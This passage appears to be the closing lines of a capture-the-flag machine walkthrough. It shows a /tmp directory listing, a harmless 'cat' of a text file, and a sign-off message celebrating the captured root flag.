drwx------  2 root root 4096 May 19 21:06 vmware-root_745-4290690999
drwxrwxrwt  2 root root 4096 May 19 21:06 .X11-unix
drwxrwxrwt  2 root root 4096 May 19 21:06 .XIM-unix
svc_acc@late:/tmp$ cat tempr.txt 

Well done my friends, root flag captured. I hope you enjoyed yourselves as always. That's all folks. Happy hacking.